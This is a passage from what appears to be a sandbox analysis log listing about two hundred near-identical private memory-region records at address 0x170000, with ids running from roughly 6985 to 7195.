"private_0x0000000000170000" filename = "" Region: id = 6985 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6986 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6987 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6988 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6989 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6990 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6991 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6992 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6993 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6994 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6995 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6996 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6997 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6998 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6999 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7000 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7001 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7002 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7003 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7004 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7005 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7006 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7007 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7008 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7009 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7010 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7011 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7012 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7013 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7014 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7015 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7016 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7017 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7018 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7019 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7020 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7021 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7022 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7023 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7024 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7025 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7026 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7027 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7028 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7029 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7030 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7031 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7032 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7033 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7034 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7035 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7036 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7037 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7038 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7039 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7040 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7041 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7042 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7043 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7044 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7045 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7046 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7047 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7048 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7049 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7050 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7051 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7052 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7053 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7054 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7055 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7056 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7057 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7058 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7059 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7060 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7061 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7062 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7063 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7064 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7065 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7066 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7067 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7068 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7069 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7070 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7071 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7072 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7073 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7074 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7075 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7076 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7077 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7078 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7079 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7080 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7081 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7082 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7083 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7084 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7085 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7086 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7087 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7088 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7089 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7090 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7091 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7092 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7093 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7094 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7095 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7096 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7097 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7098 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7099 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7100 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7101 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7102 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7103 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7104 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7105 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7106 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7107 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7108 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7109 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7110 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7111 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7112 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7113 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7114 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7115 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7116 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7117 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7118 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7119 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7120 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7121 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7122 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7123 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7124 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7125 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7126 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7127 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7128 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7129 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7130 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7131 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7132 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7133 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7134 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7135 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7136 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7137 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7138 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7139 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7140 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7141 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7142 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7143 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7144 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7145 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7146 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7147 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7148 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7149 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7150 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7151 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7152 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7153 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7154 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7155 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7156 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7157 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7158 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7159 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7160 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7161 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7162 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7163 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7164 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7165 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7166 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7167 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7168 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7169 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7170 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7171 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7172 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7173 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7174 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7175 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7176 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7177 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7178 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7179 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7180 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7181 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7182 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7183 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7184 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7185 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7186 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7187 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7188 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7189 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7190 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7191 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7192 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7193 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7194 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7195 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" 